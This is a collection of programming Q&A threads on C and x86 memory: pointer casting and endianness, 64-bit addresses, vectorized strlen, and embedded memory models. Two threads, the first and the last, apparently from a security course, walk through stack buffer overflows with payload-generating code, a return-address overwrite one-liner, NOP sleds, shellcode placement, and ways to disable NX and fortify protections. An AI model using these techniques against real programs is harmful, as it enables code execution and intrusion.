C Buffer overflow - Return address not expressible in ASCII

I'm trying to overflow a buffer of 64 bytes.
The buffer is being filled by a call to gets.
My understanding is that I need to write a total of 65 bytes to fill the buffer, and then another 4 bytes to overwrite the saved frame pointer.
The next 4 bytes should overwrite the return address.
However, the address that I wish to write is 804846A.
Is this the same as 0x0804846A? If so, I'm finding it hard to enter 04 (^D).
Should the bytes be entered in reverse order (6A 84 04 08)?
Some initial experiments that I ran with the input ZZZZZ..(64 times)..AAAABBBB ended up setting the ebp register to 0x42414141.
The architecture in question is x86.
Update: I managed to get ASCII codes 0x04 and 0x08 working. The issue seems to be with 0x84. I tried copying the symbol corresponding to 0x84 from http://www.ascii-code.com, which is apparently „. However, C seems to resolve this symbol into a representation larger than 1 byte.
I also tried using ä, as mentioned on http://www.theasciicode.com.ar
This also resulted in a representation larger than 1 byte.
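What's happening is that the terminal encodes „ and ä as multi-byte UTF-8 sequences, so the program never receives a single 0x84 byte. A more reliable approach is to generate the payload programmatically and pipe it in. A minimal sketch (the Z/A filler follows the experiments above; the program names and exact offsets are assumptions and may need adjusting for your binary):

#include <stdio.h>

int main(void)
{
    int i;
    for (i = 0; i < 64; i++)      /* fill the 64-byte buffer */
        putchar('Z');
    for (i = 0; i < 4; i++)       /* clobber the saved frame pointer */
        putchar('A');
    /* return address 0x0804846A, least significant byte first,
       since x86 is little-endian */
    putchar(0x6a);
    putchar(0x84);
    putchar(0x04);
    putchar(0x08);
    putchar('\n');                /* terminate the line read by gets */
    return 0;
}

Compile it as, say, payload, then run ./payload | ./vulnerable.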

You seem to be depending on implementation details of a particular compiler and CPU architecture. For example:
Not all CPU architectures use a frame pointer at all.
Endianness varies across different CPUs, and this would affect whether you need to "reverse" the bytes or not.
Where the stack metainformation (the frame pointer, etc.) is located with respect to a given local variable will differ between compilers, and even between the same compiler using different optimization options.


What's the difference between these pointer dereferencements

This is the kind of question where you are sure it is a duplicate, but you need to ask anyway. I don't know the terminology, so I don't know what to search for; I'm just asking for the right terminology based on the example I give.
Can someone explain to me the difference (or even just the correct terminology, and I can google the difference myself) between these two:
UINT32 v32;
UINT32* v32_ptr = &v32;
UINT16 v16_1 = *(UINT16*)v32_ptr; // Version 1 of dereferencement
UINT16 v16_2 = (UINT16)*v32_ptr; // Version 2 of dereferencement
The result is the same, but what about the use cases?
In the first case, you are casting a 32-bit pointer to a 16-bit pointer and dereferencing that. In the second case, you are dereferencing a 32-bit pointer.
In both cases, you are assigning to a 16-bit variable.
The results are not always the same; it depends on the architecture's endianness. If the architecture is little-endian, the two 16-bit variables will be equal over the entire range of values the source can take. But if the architecture is big-endian, the values will often differ.
EDIT
In light of your question in the comments below, I thought an example would be helpful here.
Consider the following and pretend the architecture can choose which endian it likes. Also, let's use the value 0x4241, and have the process write it out 4 times alternating big/little-endian, the first two times as UINT32 and the last two times as UINT16.
address data
0xABCD0000 00 00 42 41 // big-endian, UINT32, value 0x4241
0xABCD0004 41 42 00 00 // little-endian, UINT32
0xABCD0008 42 41 // big-endian, UINT16
0xABCD000A 41 42 // little-endian, UINT16
The last two are to help visualize the differences.
When we set v32_ptr to the address of v32, it receives the memory address 0xABCD0000 (for example). The value is laid out big-endian in memory. If we cast v32_ptr to a (UINT16*), the memory address does not change, but now only the first two bytes are used. Dereferencing it as a 16-bit pointer yields 0, but dereferencing it as a 32-bit pointer yields 0x4241.
Now do the same with the little-endian variables. Here our memory addresses are 0xABCD0004 and 0xABCD000A. Setting v32_ptr to 0xABCD0004 and dereferencing it as a (UINT16*) (LE), you get the value 0x4241. That is the same value you would get by dereferencing a 16-bit LE pointer (like the one at address 0xABCD000A).
Both casts truncate the 32-bit original value, but I hope you can now see the difference.
Lastly
This information has applications in network programming, embedded systems, and peer-to-peer and client-server protocols. Little-endian is almost universal today, but there are still systems that are BE, and some older network protocols explicitly chose BE ("network byte order"). A specific application of your example is testing the endianness of the system you are running on (useful for portable source code): set v32 = 0x4241, dereference both ways, and compare. If v16_1 and v16_2 are the same (both 0x4241), the system is LE; if they differ (one yields 0x4241 and the other 0), the system is BE.
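A minimal sketch of that test (note that, as in the snippet above, the cast-and-dereference is technically undefined behavior under C's aliasing rules; it is nonetheless the standard trick and works on common compilers):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
    uint32_t v32 = 0x4241;
    uint32_t *v32_ptr = &v32;

    uint16_t v16_1 = *(uint16_t *)v32_ptr;  /* reads the first two bytes in memory */
    uint16_t v16_2 = (uint16_t)*v32_ptr;    /* truncates the 32-bit value */

    puts(v16_1 == v16_2 ? "little-endian" : "big-endian");
    return 0;
}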

Why does a file pointer have a 28-bit address on a 64-bit OS?

I'm a novice at programming, and there is one unimportant but confusing problem that bothers me.
Let me post my code first:
#include <stdio.h>

int main(void)
{
    FILE *fp;
    int i;
    fp = fopen("test_data.txt", "r");
    printf("i's address=%p\n", (void *)&i);
    printf("fp's address=%p\n", (void *)fp);
    printf("stdout's address=%p\n", (void *)stdout);
    fclose(fp); /* was close(fp): close() takes an int fd, not a FILE* */
    return 0;
}
The output is:
i's address=0x7ffd038ab8cc
fp's address=0x231c010
stdout's address=0x7fbb2e4f7980
My problem is: why is fp's address only 28 bits? Shouldn't it be the same as normal variables and standard output (48 bits)?
I use GCC on 64-bit Ubuntu Linux.
Thanks for your answers!
The most likely case here is that your file pointer's address simply starts with zeros, which are omitted by default.
Edit: Here is a question that points to a similar kind of problem.
fopen is likely to call malloc to get its FILE* handle.
And some implementations of malloc allocate "small" objects and "large" objects differently - in different address-space segments (obtained with mmap(2) or some other system call; see syscalls(2)...)
On some implementations, stdout is a pointer to some static data...
Also, you probably have ASLR enabled...
You might investigate by using pmap(1) on your running process. See also proc(5); if you have time to spare, sequentially read lines from /proc/self/maps inside your program and copy them to stdout; also try cat /proc/$$/maps to understand your shell's virtual address space.
You could also strace(1) your program to understand the many system calls it makes...
But you really should not bother. From a C perspective, addresses are more or less random (unless you dive into implementation details).
(On some x86-64 processors, there are really only 48 bits of address, with the highest 16 bits all zeros or all ones.)
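Here's a sketch of that /proc/self/maps suggestion (Linux-specific; error handling kept minimal):

#include <stdio.h>

int main(void)
{
    /* Copy this process's memory map to stdout, byte by byte. */
    FILE *maps = fopen("/proc/self/maps", "r");
    int c;
    if (maps == NULL) {
        perror("fopen");
        return 1;
    }
    while ((c = fgetc(maps)) != EOF)
        putchar(c);
    fclose(maps);
    return 0;
}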
As you may know, the addresses of variables and pointers are normally displayed in hexadecimal format.
If you directly convert 0x231c010 (base 16) you get something like 0000 0010 0011 0001 1100 0000 0001 0000 (base 2).
Written out with its leading zeros, that is a 32-bit value.
If you are familiar with computer architecture, you may know that datapaths (used to transfer data between components such as RAM and the processor) widen small values by zero- or sign-extension.
But the pointer here is still a full 64-bit value: the heap simply happens to sit at a low address, so its upper bits are all zero, and %p omits leading zeros, which is why you see a short address even on a 64-bit OS.

vectorized strlen getting away with reading unallocated memory

While studying OSX 10.9.4's implementation of strlen, I noticed that it always compares a chunk of 16 bytes and skips ahead to the following 16 bytes until it encounters a '\0'. The relevant part:
3de0: 48 83 c7 10 add $0x10,%rdi
3de4: 66 0f ef c0 pxor %xmm0,%xmm0
3de8: 66 0f 74 07 pcmpeqb (%rdi),%xmm0
3dec: 66 0f d7 f0 pmovmskb %xmm0,%esi
3df0: 85 f6 test %esi,%esi
3df2: 74 ec je 3de0 <__platform_strlen+0x40>
0x10 is 16 bytes in hex.
When I saw that, I was wondering: this memory could just as well not be allocated. If I had allocated a C string of 20 bytes and passed it to strlen, it would read 36 bytes of memory. Why is it allowed to do that? I started looking and found How dangerous is it to access an array out of bounds?
This confirmed that it's definitely not always safe; unallocated memory might be unmapped, for example. Yet there must be something that makes this work. Some of my hypotheses:
OSX not only guarantees that its allocations are 16-byte aligned, but also that the "quantum" of an allocation is a 16-byte chunk. Said another way, allocating 5 bytes will actually allocate 16 bytes; allocating 20 bytes will actually allocate 32 bytes.
It's not harmful per se to read off the end of an array when you're writing asm, as it's not undefined behaviour there, as long as it's within bounds (within a page?).
What's the actual reason?
EDIT: just found Why I'm getting read and write permission on unallocated memory?, which seems to indicate my first guess was right.
EDIT 2: Stupidly enough, I had forgotten that even though Apple seems to have removed the source of most of its asm implementations (Where did OSX's x86-64 assembly libc routines go?), it left strlen: http://www.opensource.apple.com/source/Libc/Libc-997.90.3/x86_64/string/strlen.s
In the comments we find:
// returns the length of the string s (i.e. the distance in bytes from
// s to the first NUL byte following s). We look for NUL bytes using
// pcmpeqb on 16-byte aligned blocks. Although this may read past the
// end of the string, because all access is aligned, it will never
// read past the end of the string across a page boundary, or even
// accross a cacheline.
EDIT: I honestly think all the answerers deserved an accepted answer, and basically all of them contained the information necessary to understand the issue. So I went with the answer from the person who had the least reputation.
I'm the author of the routine in question.
As some others have said, the key thing is that the reads are all aligned. While reading outside the bounds of an array is undefined behavior in C, we're not writing C; we know lots of details of the x86 architecture beyond what the C abstract machine defines.
In particular, reads beyond the end of a buffer are safe (meaning they cannot produce a trap or other observable side effect) so long as they do not cross a page boundary (because memory attributes and mappings are tracked at page granularity). Since the smallest supported page size is 4096 bytes, an aligned 16 byte load cannot cross a page boundary.
Reading memory on most architectures only has a side effect if the address being read corresponds to a page that is not mapped. Most strlen implementations for modern computers try to do only aligned reads of however-many bytes. They will never do a 16-byte read straddling two pages, and so they will never elicit any side effect. So it's cool.
How malloc aligns things is irrelevant, since the programmer may allocate a string inside a larger block. A simple example is a struct that has an embedded char array:
struct Foo
{
int bar;
char baz[10];
};
If you allocate an instance of this struct, it will take up 16 bytes, but baz starts at offset 4. Thus, if you read 16 bytes starting at baz, you will cross into the next 16-byte chunk, which you don't own. If you are unlucky, that chunk may lie in the next page and trigger a fault.
Also, strings don't have to be in the heap at all; think of string constants in a read-only data section. strlen must work in all cases.
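A quick way to confirm that layout (the values assume a typical ABI with a 4-byte int and 4-byte struct alignment):

#include <stddef.h>
#include <stdio.h>

struct Foo
{
    int bar;
    char baz[10];
};

int main(void)
{
    printf("sizeof(struct Foo) = %zu\n", sizeof(struct Foo));        /* typically 16 */
    printf("offsetof(Foo, baz) = %zu\n", offsetof(struct Foo, baz)); /* typically 4 */
    return 0;
}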
I assume the strlen function first processes the initial portion of the string until it is 16-byte aligned (that code has been omitted from the question) and then proceeds in 16-byte chunks. As such, the actual reason this works is your reason #2: you won't cross a page boundary, which is the granularity of the processor's access checking.
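For illustration, here's the same idea in portable-ish C using word-sized aligned reads instead of SSE. This is a sketch only: reading past the end of an array is still undefined behavior in ISO C, exactly as discussed above, and the zero-byte test is the classic "haszero" bit trick.

#include <stddef.h>
#include <stdint.h>

size_t strlen_aligned(const char *s)
{
    const char *p = s;

    /* Scan byte by byte until p is 8-byte aligned. */
    while ((uintptr_t)p % sizeof(uint64_t) != 0) {
        if (*p == '\0')
            return (size_t)(p - s);
        p++;
    }

    /* Read one aligned word at a time. An aligned 8-byte load can
       never straddle a 4096-byte page, so it cannot fault even if
       it reads past the end of the string. */
    const uint64_t *w = (const uint64_t *)p;
    while (!((*w - 0x0101010101010101ULL) & ~*w & 0x8080808080808080ULL))
        w++;

    /* A zero byte lies somewhere in this word; locate it exactly. */
    p = (const char *)w;
    while (*p != '\0')
        p++;
    return (size_t)(p - s);
}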
Allocating Small Memory Blocks Using Malloc
...
When allocating any small blocks of memory, remember that the granularity for blocks allocated by the malloc library is 16 bytes. Thus, the smallest block of memory you can allocate is 16 bytes and any blocks larger than that are a multiple of 16. For example, if you call malloc and ask for 4 bytes, it returns a block whose size is 16 bytes; if you request 24 bytes, it returns a block whose size is 32 bytes. Because of this granularity, you should design your data structures carefully and try to make them multiples of 16 bytes whenever possible.
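That granularity is easy to observe with the Darwin-specific malloc_size call from <malloc/malloc.h> (a quick sketch; the expected values assume the default macOS allocator):

#include <malloc/malloc.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    void *p = malloc(4);
    void *q = malloc(24);
    printf("malloc(4)  -> block of %zu bytes\n", malloc_size(p));  /* expect 16 */
    printf("malloc(24) -> block of %zu bytes\n", malloc_size(q));  /* expect 32 */
    free(p);
    free(q);
    return 0;
}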
For the record, referencing (reading) past allocation could trigger a page fault if you cross a page boundary. This is how guardmalloc works:
Each malloc allocation is placed on its own virtual memory page (or pages). By default, the returned address for the allocation is positioned such that the end of the allocated buffer is at the end of the last page, and the next page after that is kept unallocated. Thus, accesses beyond the end of the buffer cause a bad access error immediately.
Also read the explicit reference to vectorized instructions on the same page:
As of Mac OS X 10.5, libgmalloc aligns the start of allocated buffers on 16-byte boundaries by default, to allow proper use of vector instructions (e.g., SSE). (The use of vector instructions is common, including in some Mac OS X system libraries.)
PS: AFAIK, NSObject and friends share the heap implementation with malloc.
Note that it is an aligned read (implied by it being part of a non-vex-encoded instruction that isn't explicitly an unaligned read). That means that while it may (and often does) read beyond the end of the string, it will always stay on a page that the string is on.

How are addresses resolved by a compiler in a medium memory model?

I'm new to programming small/medium memory models CPUs. I am working with an embedded processor that has 256KB of flash code space contained in addresses 0x00000 to 0x3FFFF, and with 20KB of RAM contained in addresses 0xF0000 to 0xFFFFF. There are compiler options to choose between small, medium, or large memory models. I have medium selected. My question is, how does the compiler differentiate between a code/flash address and a RAM address?
Take for example: I have a 1-byte variable at RAM address 10, and I have a const variable at the real address 10. I did something like:
value = *((unsigned char *)10);
How would the compiler choose between the real address 10 and the (virtual?) address 10? I suppose if I wanted to specify the value at real address 10 I would use:
value = *((const unsigned char *)10);
?
Also, can you explain the following code, which I believe is related to the answer:
uint32_t var32; // 32 bit unsigned integer.
unsigned char *ptr; // 2 byte pointer.
ptr = (unsigned char *)5;
var32 = (uint32_t)ptr;
printf("%lu", var32)
The code prints 983045 (0xF0005 in hex). It seems unrealistic: how can a 16-bit pointer yield a value greater than what 16 bits can store?
Read your compiler's documentation to find out details about each memory model.
It may have various sorts of pointers, e.g. char near * being 2 bytes and char far * being 4 bytes. Alternatively (or in addition), it might have instructions for changing code pages which you'd have to invoke manually.
how can a 16 bit variable return a value greater than what 16 bits can store?
It can't. Your code converts the pointer to a 32-bit int, and 0xF0005 fits in a 32-bit int. Based on your description, I'd guess that char * points only to the data area, and you would use a different sort of pointer to point to the code area.
I tried to comment on Matt's answer but my comment was too long, and I think it might be an answer, so here's my comment:
I think this is an answer, though I'm really looking for more details. I've read the manual, but it doesn't have much information on the topic. You are right: the compiler has near/far keywords you can use to manually specify the address type. I guess the C compiler knows whether a variable is behind a near or far pointer, and for a near pointer it generates instructions that map the 2-byte near pointer to a real address; these generated mapping instructions are opaque to the C programmer. That would be my only guess, and it's also why the pointer yields a value greater than its 16-bit contents: the compiler maps the address to an absolute address before storing the value in var32. This is possible because 1) the RAM addresses begin at 0xF0000 and end at 0xFFFFF, so you can always map a near address to its absolute address by OR'ing it with 0xF0000, and 2) there is no overlap between a code (far) pointer and a near pointer OR'd with 0xF0000. Can anyone confirm?
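For what it's worth, the mapping guessed at above would amount to something like this (a sketch; the function name is made up, and the fixed 0xF0000 base comes from the question's memory map):

#include <stdint.h>

/* Widen a 16-bit near (RAM) pointer to its absolute 20-bit address,
   assuming all RAM lives in 0xF0000-0xFFFFF. */
uint32_t near_to_linear(uint16_t near_ptr)
{
    return 0xF0000UL | near_ptr;   /* e.g. 0x0005 -> 0xF0005 */
}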
My first take would be to read the documentation; however, as I can see, that was already done.
So my assumption is that you somehow got to work on, for example, a large existing codebase developed with a not-too-widely-supported compiler on a not-too-well-known architecture.
In such a case (after all my attempts at acquiring proper documentation failed), my approach would be generating assembler output for test programs and analysing it. I did this a while ago, so this is not from thin air (it was an 8051 PL/M compiler running on an MDS-70, which was emulated by a DOS-based emulator from the late 80s, for which DOS was emulated by DOSBox - yes, and for the huge codebase we needed to maintain, we couldn't get around this mess).
So build simple programs which do something with some pointers, compile them without optimizations to assembly (or request an assembly dump, whatever the compiler can do for you), and understand the output. Try to cover all the pointer types and memory models your compiler knows of. This will clarify what is happening, and hopefully the existing documentation will also help once you understand its gaps this way. Finally, don't stop at understanding just enough for the immediate problem; try to document the gaps properly, so later you won't need to redo the experiments to figure out things you had once almost worked out.
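For example, a probe as small as this (identifiers are arbitrary), compiled once per memory model, will show how the compiler addresses flash versus RAM in the generated assembly:

const unsigned char code_byte = 0x42;   /* const data: should land in flash */
unsigned char ram_byte;                 /* mutable data: should land in RAM */

unsigned char read_const(void) { return code_byte; }
unsigned char read_ram(void)   { return ram_byte; }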

Create buffer overflows in Snow Leopard

As part of a university course in computer security, I'm soon about to learn about buffer overflows and how to use them as exploits. I'm trying to do a simple buffer overflow with the following code:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer_one[4], buffer_two[16];
strcpy(buffer_one, "one");
strcpy(buffer_two, "two");
strcpy(buffer_one, argv[1]);
printf("buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
printf("buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
}
I'm able to overwrite the content of buffer_one with the null terminator if I run
$./overflow 1234567890123456
buffer_two is at 0x7fff5fbff8d0 and contains '1234567890123456'
buffer_one is at 0x7fff5fbff8e0 and contains ''
But if I send more than 16 characters as the argument, the program dies with "Abort trap". I suppose this is some sort of buffer protection on Snow Leopard (ASLR maybe?). If I make the size of buffer_two < 16, the addresses are still 16 bytes apart.
I'm running gcc -o overflow overflow.c -fno-stack-protector to remove stack protection
Is there any solution to this problem, other than installing a VM running a Linux distribution?
The key to why this is happening is the fact that buffer_one is located after buffer_two in memory. This means that when you overflow buffer_one, you are not overflowing into buffer_two. Instead you are overflowing into stack memory being used to hold other things, such as the saved ebp pointer and most importantly, the return address.
And this is exactly what you want to happen when attempting a buffer overflow exploit! When the program executes strcpy(buffer_one, argv[1]); the first four bytes from argv[1] go into the memory allocated for buffer_one, but the next 12 start overflowing memory used for other things, eventually overwriting the return address. Without seeing the machine code, I can't say for sure which bytes exactly overwrite the return address, but I'm guessing the value of EIP at the time of the SIGABRT is 0x31323334 or something similar (the hex representation of '1234'). The key is realizing that by being able to overwrite the return address, you control EIP. And when you control EIP, you control the system (somewhat exaggerated, but in most cases not far off): you control which instructions the processor will execute next (putting aside for the moment the fact that the OS/kernel stands in between).
Now if you find exactly which eight bytes overwrite the return address, you can replace those bytes with the address of your buffer (0x00007fff5fbff8e0), and instead of returning to the original caller (libc in this case), the program will start executing the instructions you provided (AKA the shellcode). Note that you will have to fill in the implied 0s in the most significant places and provide the address as actual nonprintable characters (0x00 0x00 0x7f 0xff 0x5f and so on), not the literal digits/characters 7ff5 etc. Since x86-64 is little-endian, you'll also have to supply the bytes backwards -- 0xe0 0xf8 0xbf etc. Supplying these nonprintable characters is most easily accomplished using backticks and command substitution with a brief Python or Perl script:
./overflow `python -c 'print "AAAAAAAAAAAAAAAA\xe0\xf8\xbf\x5f\xff\x7f"'`
(The A's are padding to overflow the buffer.) Unfortunately, you won't be able to provide the 2 additional \x00 bytes needed for the address. One of these NULs will be placed there for you by strcpy, but you'll have to get lucky with the last NUL and hope the byte you're overwriting is already 0x00 (which is actually highly likely). Now when you execute this with the right number of A's, you'll probably still get a segmentation fault or possibly an illegal instruction, since you'll now jump to the capital A's and execute them as actual machine instructions (0x41 => inc ecx on 32-bit x86; in 64-bit mode it's a REX prefix).
Then finally the last piece is putting in the actual shellcode. Given your limited buffer sizes, it will be very hard to provide anything useful in only 12 bytes or so. Since you are writing the code in this case, the easiest thing will probably be to make your buffer bigger. If this weren't an option, then you could either A) use buffer_two as well for 16 more bytes since it comes before buffer_one or B) provide the shellcode in an environment variable and jump to that instead.
If you wish to write the actual shellcode yourself, you'll have to know how to perform syscalls and what calling conventions are and how to use them, as well as how to avoid NULL bytes in the shellcode. The other alternative is to use a payload generator such as the one included with Metasploit which will make it a lot easier (although you won't learn nearly as much).
These are technically the only pieces you need, especially since you have a good idea of what the address will be. However, many times (especially when the shellcode address is not known) a so-called NOP sled is placed in front of the shellcode so that you don't have to get the address exactly right. A NOP sled (NOP being short for "no operation") is simply hundreds to thousands of NOP instructions (0x90); you can jump into the middle of the sled, and nothing happens until execution slides into the shellcode.
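For instance, a sled-bearing payload could be generated like this (a sketch: the sled length, the empty shellcode placeholder, and the guessed address bytes are all assumptions):

#include <stdio.h>

int main(void)
{
    int i;
    /* 1. The sled: landing anywhere here slides execution forward. */
    for (i = 0; i < 200; i++)
        putchar(0x90);                 /* x86 NOP */
    /* 2. The shellcode bytes would be emitted here. */
    /* 3. The guessed buffer address, least significant byte first. */
    unsigned char addr[] = { 0xe0, 0xf8, 0xbf, 0x5f, 0xff, 0x7f };
    fwrite(addr, 1, sizeof addr, stdout);
    return 0;
}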
If you trace everything in GDB and execution jumps to the shellcode correctly but you still get access violations, it's likely because the NX bit is set on the stack page, meaning that the processor will refuse to execute data from the stack as instructions. I'm not sure whether execstack is included with OSX, but if so, you can use it for testing purposes to disable the NX bit (execstack -s overflow).
I apologize for the wall of text, but I wasn't sure how far you wanted to go studying buffer overflows. There's other guides you can check out as well, such as Aleph One's archetypal guide, "Smashing the Stack for Fun and Profit". The Shellcoder's Handbook is a good book to check out as well, and I'm sure others can add recommendations.
TL;DR: In short, you are overflowing your buffer and overwriting saved pointers and return addresses with garbage.
If you are learning about exploits then you'll need to really dig into details.
Go ahead, read the machine code! You might be able to find out how to slip the overflow past whatever check method Snow Leopard is using.
The problem may be simpler than that too. There's no rule that the compiler has to put buffer_one and buffer_two in any particular order on the stack or even put them on the stack at all. Notice that buffer_one would actually fit into a register.
That isn't the case here, of course, but I see that buffer_two is placed before buffer_one. That means that an overflow of buffer_one will never write into buffer_two. I can't explain why buffer_one ends up containing '', but f8d0 is definitely before f8e0 in memory.
Data on the stack on x86 is 4-byte aligned. Padding is placed between buffer_two and buffer_one if buffer_two's length is not a multiple of 4 bytes. Change it to 12 or fewer and they should be 12 bytes apart, etc.
[Update] I overlooked the address size. You are on a 64-bit system, so your stack is 8-byte aligned. The address differences won't change until your buffer size changes by at least 8 bytes.
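You can watch the spacing change with a quick probe (the compiler is free to reorder or pad the buffers, so treat the output as informative only):

#include <stdio.h>

int main(void)
{
    char buffer_one[4], buffer_two[12];   /* vary buffer_two's size and re-run */
    printf("buffer_two at %p\n", (void *)buffer_two);
    printf("buffer_one at %p\n", (void *)buffer_one);
    return 0;
}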
Is this line correct:
strcpy(buffer_one, argv[1]);
The output looks like you are copying argv[1] into buffer_two.
Given that, how much are you copying when it crashes? 17 bytes? 18? If it is more than 24, you will start clobbering the stack in ways that would lead to the abort.
Note that "1234567890123456" actually copies 17 bytes, including the null terminator that truncates buffer_one.
Have you tried to disable FORTIFY_SOURCE when compiling?
-D_FORTIFY_SOURCE=0
